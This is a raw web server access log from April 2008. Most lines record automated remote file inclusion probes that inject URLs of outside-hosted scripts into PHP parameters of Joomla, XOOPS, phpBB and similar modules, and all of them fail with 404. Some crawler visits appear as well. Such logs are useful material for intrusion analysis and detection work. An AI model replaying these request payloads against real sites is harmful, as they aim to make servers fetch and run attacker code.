83.172.150.11 - - [13/Apr/2008:21:06:07 -0600] "GET /homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
64.141.103.91 - - [13/Apr/2008:21:06:11 -0600] "GET //includes/kb_constants.php?module_root_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 232 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
64.141.103.91 - - [13/Apr/2008:21:06:11 -0600] "GET /logs//includes/kb_constants.php?module_root_path=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
74.200.207.18 - - [13/Apr/2008:21:06:40 -0600] "GET /logs/error_log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
222.236.47.176 - - [13/Apr/2008:21:06:51 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.47.176 - - [13/Apr/2008:21:06:51 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.97.43.58 - - [13/Apr/2008:21:08:34 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:08:34 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:08:34 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:08:34 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:08:34 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:08:35 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
85.94.205.6 - - [13/Apr/2008:21:08:55 -0600] "GET /logs/index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
85.94.205.6 - - [13/Apr/2008:21:08:56 -0600] "GET /index1.php?x=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
212.241.218.41 - - [13/Apr/2008:21:08:59 -0600] "GET /logs/homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
212.241.218.41 - - [13/Apr/2008:21:09:00 -0600] "GET /homepage.php?sel=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 230 "-" "libwww-perl/5.803"
85.94.205.6 - - [13/Apr/2008:21:10:32 -0600] "GET /logs/port.php?content=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.94.205.6 - - [13/Apr/2008:21:10:32 -0600] "GET /port.php?content=http://agrocaes.com.br/site/images/g4.gif?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
208.71.129.241 - - [13/Apr/2008:21:10:48 -0600] "GET /Schuttehttp://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
208.71.129.241 - - [13/Apr/2008:21:10:48 -0600] "GET /logs/Schuttehttp://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
74.6.22.176 - - [13/Apr/2008:21:11:15 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.23.59 - - [13/Apr/2008:21:11:16 -0600] "GET /?D=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET /logs/access_log.20080127//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 241 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:11:40 -0600] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 246 "-" "libwww-perl/5.53"
70.84.7.82 - - [13/Apr/2008:21:11:58 -0600] "GET //error.php?prefix=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
70.84.7.82 - - [13/Apr/2008:21:11:58 -0600] "GET /logs//error.php?prefix=http://dkgerman.dankook.ac.kr/bbs/icon/private_style/style/test.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
74.200.207.18 - - [13/Apr/2008:21:12:16 -0600] "GET /logs/access_log//mambots/content/josowbot.content.php?mosConfig_absolute_path=http://www.gifr.fr/images/cni?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
64.141.103.91 - - [13/Apr/2008:21:12:27 -0600] "GET /index1.php?=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
69.93.107.242 - - [13/Apr/2008:21:13:26 -0600] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 255 "-" "Avant Browser (http://www.avantbrowser.com)"
69.93.107.242 - - [13/Apr/2008:21:13:27 -0600] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://bnb-chambresdhotes.ch///components/com_easygallery/bo.do?? HTTP/1.1" 404 260 "-" "Avant Browser (http://www.avantbrowser.com)"
64.141.103.91 - - [13/Apr/2008:21:14:57 -0600] "GET /index.php?body=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 227 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
64.141.103.91 - - [13/Apr/2008:21:14:57 -0600] "GET /logs/index.php?body=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 232 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.97.43.58 - - [13/Apr/2008:21:15:04 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:15:04 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
195.82.99.126 - - [13/Apr/2008:21:15:47 -0600] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
195.82.99.126 - - [13/Apr/2008:21:15:47 -0600] "GET /modules/My_eGallery/index.php?basepath=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 235 "-" "Microsoft Pocket Internet Explorer/0.6"
91.185.193.111 - - [13/Apr/2008:21:17:28 -0600] "GET /logs/index.php?go1=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:21:17:28 -0600] "GET /index.php?go1=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
64.141.103.91 - - [13/Apr/2008:21:17:51 -0600] "GET /index.php?go1=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 227 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
64.141.103.91 - - [13/Apr/2008:21:17:51 -0600] "GET /logs/index.php?go1=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
216.97.43.58 - - [13/Apr/2008:21:18:12 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
216.97.43.58 - - [13/Apr/2008:21:18:12 -0600] "GET /logs/access_log.20080330//modules/My_eGallery/public/displayCategory.php?basepath=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 266 "-" "libwww-perl/5.53"
85.25.144.182 - - [13/Apr/2008:21:18:14 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
85.25.144.182 - - [13/Apr/2008:21:18:14 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
64.34.173.70 - - [13/Apr/2008:21:18:19 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
64.34.173.70 - - [13/Apr/2008:21:18:19 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/tiaraputri47/cantik.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
91.185.193.111 - - [13/Apr/2008:21:19:59 -0600] "GET /logs/index.php?go1=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
91.185.193.111 - - [13/Apr/2008:21:19:59 -0600] "GET /index.php?go1=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
65.55.208.111 - - [13/Apr/2008:21:22:05 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.111 - - [13/Apr/2008:21:22:05 -0600] "GET /logs/access_log.20080224 HTTP/1.1" 404 230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.75.143.93 - - [13/Apr/2008:21:22:44 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
62.75.143.93 - - [13/Apr/2008:21:22:44 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
222.236.47.176 - - [13/Apr/2008:21:26:20 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.47.176 - - [13/Apr/2008:21:26:20 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
64.141.103.91 - - [13/Apr/2008:21:26:40 -0600] "GET /content/article.php?ide=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 225 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
64.141.103.91 - - [13/Apr/2008:21:26:40 -0600] "GET /logs/content/article.php?ide=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
209.97.214.130 - - [13/Apr/2008:21:30:14 -0600] "GET /logs/error_log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
209.97.214.130 - - [13/Apr/2008:21:30:14 -0600] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
209.97.214.130 - - [13/Apr/2008:21:30:14 -0600] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
209.97.214.130 - - [13/Apr/2008:21:31:23 -0600] "GET /logs/error_log.20080330//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.bestbid.co.nz/image/id.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.79"
222.236.47.176 - - [13/Apr/2008:21:37:04 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.47.176 - - [13/Apr/2008:21:37:04 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
69.64.50.43 - - [13/Apr/2008:21:38:26 -0600] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
69.64.50.43 - - [13/Apr/2008:21:38:26 -0600] "GET //claroline/tracking/userLog.php?rootSys=http://www.arkamax.com.ar/test.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
200.138.218.40 - - [13/Apr/2008:21:38:38 -0600] "GET /logs/access_log/main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
200.138.218.40 - - [13/Apr/2008:21:38:39 -0600] "GET /main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
200.138.218.40 - - [13/Apr/2008:21:38:40 -0600] "GET /logs/main.php?pagina=http://www.anje.pt/echo2.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
88.191.71.30 - - [13/Apr/2008:21:42:42 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.803"
88.191.71.30 - - [13/Apr/2008:21:42:42 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
69.93.107.242 - - [13/Apr/2008:21:45:04 -0600] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.810"
69.93.107.242 - - [13/Apr/2008:21:45:04 -0600] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.boewe-security.de/galerie//update/data.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.810"
85.68.179.138 - - [13/Apr/2008:21:45:27 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0)"
71.99.89.199 - - [13/Apr/2008:21:45:55 -0600] "GET /logs/error_log.20080330http://workersparty.chat.ru/images? HTTP/1.0" 404 251 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122"
85.68.179.138 - - [13/Apr/2008:21:46:03 -0600] "GET /logs/error_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 242 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
24.56.216.106 - - [13/Apr/2008:21:46:12 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122"
72.13.139.176 - - [13/Apr/2008:21:48:29 -0600] "GET /logs/error_log.20080330http://workersparty.chat.ru/images? HTTP/1.0" 404 251 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021"
121.210.35.251 - - [13/Apr/2008:21:49:02 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"
61.222.36.82 - - [13/Apr/2008:21:50:49 -0600] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
61.222.36.82 - - [13/Apr/2008:21:50:49 -0600] "GET //includes/functions_portal.php?phpbb_root_path=http://61.129.163.4/on.txt?????? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
65.55.208.114 - - [13/Apr/2008:21:50:53 -0600] "GET /robots.txt HTTP/1.1" 404 216 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.114 - - [13/Apr/2008:21:50:53 -0600] "GET /logs/error_log.20080224 HTTP/1.1" 404 229 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.183.130.215 - - [13/Apr/2008:21:51:38 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)"
64.141.103.91 - - [13/Apr/2008:21:52:45 -0600] "GET /index2.php?=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
64.141.103.91 - - [13/Apr/2008:21:52:45 -0600] "GET /logs/index2.php?=http://www.systel.ru/phpbb2//language/lang_german/list.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.53.197.2 - - [13/Apr/2008:21:54:03 -0600] "GET /logs/error_log.20080330//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:21:54:03 -0600] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:21:54:03 -0600] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
74.53.197.2 - - [13/Apr/2008:21:55:15 -0600] "GET /logs/access_log.20080330//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
74.6.22.107 - - [13/Apr/2008:21:56:53 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.122 - - [13/Apr/2008:21:56:53 -0600] "GET /logs/?N=D HTTP/1.0" 200 1468 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
77.232.68.17 - - [13/Apr/2008:21:57:11 -0600] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:21:57:11 -0600] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:21:57:11 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:21:57:11 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
71.42.170.50 - - [13/Apr/2008:21:58:22 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4"
71.42.170.50 - - [13/Apr/2008:21:59:36 -0600] "GET /logs/error_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts-MyWay; (R1 1.3); .NET CLR 1.1.4322)"
77.232.68.17 - - [13/Apr/2008:22:00:52 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:22:00:52 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:22:01:17 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
77.232.68.17 - - [13/Apr/2008:22:01:17 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
84.246.21.243 - - [13/Apr/2008:22:03:02 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.246.21.243 - - [13/Apr/2008:22:03:03 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
90.158.114.6 - - [13/Apr/2008:22:03:48 -0600] "GET /logs/access_log.20080127/index.php?Load=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:22:03:48 -0600] "GET /index.php?Load=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.800"
90.158.114.6 - - [13/Apr/2008:22:03:49 -0600] "GET /logs/index.php?Load=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.800"
89.1.27.209 - - [13/Apr/2008:22:06:57 -0600] "GET /logs/access_loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)"
84.246.21.243 - - [13/Apr/2008:22:07:00 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
84.246.21.243 - - [13/Apr/2008:22:07:00 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 287 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
67.19.12.114 - - [13/Apr/2008:22:08:38 -0600] "GET /logs/includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
67.19.12.114 - - [13/Apr/2008:22:08:38 -0600] "GET /includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 229 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
213.215.223.191 - - [13/Apr/2008:22:12:51 -0600] "GET /logs/includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
213.215.223.191 - - [13/Apr/2008:22:12:51 -0600] "GET /includes/attributes.php?donsimg_base_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
